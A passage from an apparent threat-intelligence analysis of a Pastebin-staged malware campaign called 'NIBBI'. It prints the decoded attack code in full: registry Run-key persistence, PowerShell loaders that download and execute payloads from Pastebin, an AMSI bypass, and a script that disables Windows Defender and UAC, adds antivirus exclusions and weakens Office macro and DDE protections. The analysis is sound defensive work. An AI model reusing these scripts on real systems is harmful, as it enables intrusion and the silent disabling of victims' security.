This lasta campaign has been dubbed with the name of the Pastebin user spreading the malicious pastes. This time the name is “NIBBI”. The first component is 5CzmZ5NS:

Figure 5: Piece of the code of 5CzmZ5NS paste

The second one is sJEBiiMw:

Figure 6: Piece of the code of the sJEBiiMw paste

The third one, YL0je2fU:

Figure 7: Piece of the code of the YL0je2fU paste

and the fourth component, UyFaSxgj:

Figure 8: Piece of the code of the UyFaSxgj paste

This obfuscation technique is typical of this particular actor and he largely leveraged it in many malicious operations. Moreover, the usage of a legit website such as pastebin (T1102) gives a significant amount of cover such as advantages of being very often whitelisted. Using such a service permits to reduce the C2 exposure. In the past, other groups also used similar techniques to decouple attack infrastructure information from their implant configuration, groups such as APT41, FIN6 or FIN7.

Once decoded the first component (5CzmZ5NS), it unveils some logic, as shown in Code Snippet 2. First of all, the script set a registry key, as a windows persistence mechanism (T1060) in which it place the execution of the following command: “mshta vbscript:Execute(“”CreateObject(“”””Wscript.Shell””””).Run “”””powershell ((gp HKCU:\Software).iamresearcher)|IEX

<script language=”&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;”>CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\bin”, “mshta vbscript:Execute(“”CreateObject(“”””Wscript.Shell””””).Run “”””powershell ((gp HKCU:\Software).iamresearcher)|IEX””””, 0 : window.close””)”, “REG_SZ”
CreateObject(“Wscript.Shell”).regwrite “HKCU\Software\iamresearcher”, “$fucksecurityresearchers=’contactmeEX’.replace(‘contactme’,’I’);sal M $fucksecurityresearchers;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$iwannajoinuiwannaleavedsshit = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $iwannajoinuiwannaleavedsshit;$iwannaleftsellingtools= New-Object -Com Microsoft.XMLHTTP;$iwannaleftsellingtools.open(‘GET’,’https://pastebin.com/raw/rnS6CUzX’,$false);$iwannaleftsellingtools.send();$iwannaleftsellingtoolsy=$iwannaleftsellingtools.responseText;$asciiChars= $iwannaleftsellingtoolsy -split ‘-‘ |ForEach-Object {[char][byte]””0x$_””};$asciiString= $asciiChars -join ”|M;[Byte[]]$Cli2= iex(iex(‘(&(GCM *W-O*)’+ ‘Net.’+’WebC’+’lient)’+’.Dow’+’nload’+’Str’+’ing(”https://pastebin.com/raw/Rk4engdU”).replace(”#”,”!#!@#”).replace(”!#!@#”,”0x”)’)) | g;$iwannaleftsellingtools=[System.Reflection.Assembly]::Load($decompressedByteArray);[rOnAlDo]::ChRiS(‘InstallUtil.exe’,$Cli2)” , “REG_SZ”
Const HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell ((gp HKCU:\Software).iamresearcher)|IEX”, null, objConfig, intProcessID)’i am not a coder not a expert i am script kiddie expert i read code from samples on site then compile in my way’i am not a coder 😉 i watch you on twitter every day thanks 🙂 i love my code reports!’i am not a coder! bang 😉
self.close
</script>

Code Snippet 2

The code contains some “funny” comments related to the twitter community of security researchers which constantly monitor the actor operations. Then, the final payload is identified by Rk4engdU paste.

Figure 9: Piece of the rnS6CUz paste

Decoding this hex stream we get the following powershell code:

function UNpaC0k3333300001147555 {
[CmdletBinding()]    Param ([byte[]] $byteArray)  Process {     Write-Verbose “Get-DecompressedByteArray”        $input = New-Object System.IO.MemoryStream( , $byteArray )     $output = New-Object System.IO.MemoryStream            $01774000 = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress)
    $puffpass = New-Object byte[](1024)    while($true){        $read = $01774000.Read($puffpass, 0, 1024)        if ($read -le 0){break}        $output.Write($puffpass, 0, $read)        }        [byte[]] $bout333 = $output.ToArray()        Write-Output $bout333    }}
$t0=’DEX’.replace(‘D’,’I’);sal g $t0;[Byte[]]$MNB=(‘OBFUSCATED PAYLOAD ONE‘.replace(‘@!’,’0x’))| g;
[Byte[]]$blindB=(‘OBFUSCATED PAYLOAD TWO‘.replace(‘@!’,’0x’))| g
[byte[]]$deblindB = UNpaC0k3333300001147555 $blindB
$blind=[System.Reflection.Assembly]::Load($deblindB)[Amsi]::Bypass()
[byte[]]$decompressedByteArray = UNpaC0k3333300001147555  $MNB

Code Snippet 3 

The Powershell Loader

The Code Snippet 3 is a Powershell script in which the function “UNpaC0k3333300001147555” is declared, having the purpose to manipulate the two payloads in the right way. Both of them are .NET binaries. The de-obfuscated code is stored in the deblindB variable and then executed.

As suggested by the name deblindB, invoke the execution of the static method “Bypass” of the “Amsi” class.

Figure 10: Amsi Bypass exploit evidence

Instead, the payload embedded inside the variable $MNB is another type of injection tool, but this one is not executed by the script, probably because both the binaries perform the same action and only one is sufficient.

At this point, we deepen the “sJEBiiMw” component obtaining:

<script language=”&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;”>Const HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg(‘h’+’t’+’t’+’p’+’s’+’:’+’/’+’/’+’p’+’a’+’s’+’t’+’e’+’b’+’i’+’n’+’.’+’c’+’o’+’m’+’/’+’r’+’a’+’w’+’/ygwLUS9C’));$_Xpin=$_Xpin.replace(‘.’,’*!(@*#(!@#*’).replace(‘*!(@*#(!@#*’,’0′);$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X)”, null, objConfig, intProcessID)
self.close
</script>

Code Snippet 4

This script downloads and executes another script from pastebin: ygwLUS9C. It is a base64 encoded script with some basic string replacing. We also noticed this executable uses the CMSTP bypass technique (T1191), already seen in our previous report.

Figure 11: CMSTP Bypass evidence

However, in this case, there is a new element differently the previous version: through the CMSTP bypass, a VBS script is written in the “\%TEMP%\” folder, which executes many disruptive commands:

Figure 12: Evidence of the VBS script loaded and executed

The VBS script, as also mentioned inside the first row as comment, has the objective to set to zero the level of security of the infected machine. The script is the following:

‘this script will put system on 0 securityIf Not WScript.Arguments.Named.Exists(“elevate”) Then  CreateObject(“Shell.Application”).ShellExecute WScript.FullName _    , “””” & WScript.ScriptFullName & “”” /elevate”, “”, “runas”, 1  WScript.QuitEnd If
On Error Resume NextSet WshShell = CreateObject(“WScript.Shell”)WshShell.RegWrite “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware”,”0″,”REG_DWORD”WshShell.RegWrite “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring”,”0″,”REG_DWORD”WshShell.RegWrite “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection”,”0″,”REG_DWORD”WshShell.RegWrite “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable”,”0″,”REG_DWORD”
WScript.Sleep 100
outputMessage(“Set-MpPreference -DisableRealtimeMonitoring $true”)outputMessage(“Set-MpPreference -DisableBehaviorMonitoring $true”)outputMessage(“Set-MpPreference -DisableBlockAtFirstSeen $true”)outputMessage(“Set-MpPreference -DisableIOAVProtection $true”)outputMessage(“Set-MpPreference -DisableScriptScanning $true”)outputMessage(“Set-MpPreference -SubmitSamplesConsent 2”)outputMessage(“Set-MpPreference -MAPSReporting 0”)outputMessage(“Set-MpPreference -HighThreatDefaultAction 6 -Force”)outputMessage(“Set-MpPreference -ModerateThreatDefaultAction 6”)outputMessage(“Set-MpPreference -LowThreatDefaultAction 6”)outputMessage(“Set-MpPreference -SevereThreatDefaultAction 6”)

Sub outputMessage(byval args)On Error Resume NextConst HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell ” + args, null, objConfig, intProcessID)

End SubOn Error Resume NextConst HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell $cici=@(36,117,115,101,114,80,97,116,104,32,61,32,36,101,110,118,58,85,83,69,82,80,82,79,70,73,76,69,10,36,112,97,116,104,69,120,99,108,117,115,105,111,110,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,65,114,114,97,121,76,105,115,116,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,65,114,114,97,121,76,105,115,116,10,36,112,97,116,104,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,67,58,92,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,77,115,98,117,105,108,100,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,67,97,108,99,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,112,111,119,101,114,115,104,101,108,108,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,119,115,99,114,105,112,116,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,109,115,104,116,97,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,99,109,100,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,106,101,99,116,115,70,111,108,100,101,114,32,61,32,39,100,58,92,39,10,65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,112,114,111,106,101,99,116,115,70,111,108,100,101,114,10,102,111,114,101,97,99,104,32,40,36,101,120,99,108,117,115,105,111,110,32,105,110,32,36,112,97,116,104,69,120,99,108,117,115,105,111,110,115,41,32,10,123,10,32,32,32,32,87,114,105,116,101,45,72,111,115,116,32,34,65,100,100,105,110,103,32,80,97,116,104,32,69,120,99,108,117,115,105,111,110,58,32,34,32,36,101,120,99,108,117,115,105,111,110,10,32,32,32,32,65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,101,120,99,108,117,115,105,111,110,10,125,10,102,111,114,101,97,99,104,32,40,36,101,120,99,108,117,115,105,111,110,32,105,110,32,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,41,10,123,10,32,32,32,32,87,114,105,116,101,45,72,111,115,116,32,34,65,100,100,105,110,103,32,80,114,111,99,101,115,115,32,69,120,99,108,117,115,105,111,110,58,32,34,32,36,101,120,99,108,117,115,105,111,110,10,32,32,32,32,65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,114,111,99,101,115,115,32,36,101,120,99,108,117,115,105,111,110,10,125,10,87,114,105,116,101,45,72,111,115,116,32,34,34,10,87,114,105,116,101,45,72,111,115,116,32,34,89,111,117,114,32,69,120,99,108,117,115,105,111,110,115,58,34,10,36,112,114,101,102,115,32,61,32,71,101,116,45,77,112,80,114,101,102,101,114,101,110,99,101,10,36,112,114,101,102,115,46,69,120,99,108,117,115,105,111,110,80,97,116,104,10,36,112,114,101,102,115,46,69,120,99,108,117,115,105,111,110,80,114,111,99,101,115,115);[System.Text.Encoding]::ASCII.GetString($cici)|IEX”, null, objConfig, intProcessID)
CreateObject(“WScript.Shell”).RegWrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA”,”0″, “REG_DWORD”

Set wso = CreateObject(“WScript.Shell”)wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Excel\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Publisher\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Publisher\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Publisher\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Publisher\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Publisher\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Publisher\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Publisher\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Publisher\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Publisher\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Publisher\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Word\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Word\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Word\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Word\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\PowerPoint\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\PowerPoint\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\PowerPoint\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Excel\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Excel\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Excel\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Excel\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Excel\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Word\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Word\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Word\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Word\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Excel\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Excel\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Excel\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Excel\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Excel\Security\AllowDDE”, 1, “REG_DWORD”

Code Snippet 5

As seen in the code a powershell command is hidden inside the variable named $cici, which is immediately converted from the decimal to the relative ascii value. 

$userPath = $env:USERPROFILE$pathExclusions = New-Object System.Collections.ArrayList$processExclusions = New-Object System.Collections.ArrayList$pathExclusions.Add(‘C:\’) > $null$processExclusions.Add(‘Msbuild.exe’) > $null$processExclusions.Add(‘Calc.exe’) > $null$processExclusions.Add(‘powershell.exe’) > $null$processExclusions.Add(‘wscript.exe’) > $null$processExclusions.Add(‘mshta.exe’) > $null$processExclusions.Add(‘cmd.exe’) > $null$projectsFolder = ‘d:\’Add-MpPreference -ExclusionPath $projectsFolderforeach ($exclusion in $pathExclusions){    Write-Host “Adding Path Exclusion: ” $exclusion    Add-MpPreference -ExclusionPath $exclusion}foreach ($exclusion in $processExclusions){    Write-Host “Adding Process Exclusion: ” $exclusion    Add-MpPreference -ExclusionProcess $exclusion}Write-Host “”Write-Host “Your Exclusions:”$prefs = Get-MpPreference$prefs.ExclusionPath$prefs.ExclusionProcess

Code snippet 6

In Code Snippet 6 we found a powershell code instructed to insert in the Microsoft Windows Anti-Malware exclusions the following processes: msbuild, calc, powershell, wscript, mshta and cmd.

Another script in this intricated chain is YL0je2fU:

<script language=”&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;”>
CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\replcia”, “mshta vbscript:Execute(“”CreateObject(“”””Wscript.Shell””””).Run “”””powershell ((gp HKCU:\Software).mogale)|IEX””””, 0 : window.close””)”, “REG_SZ”

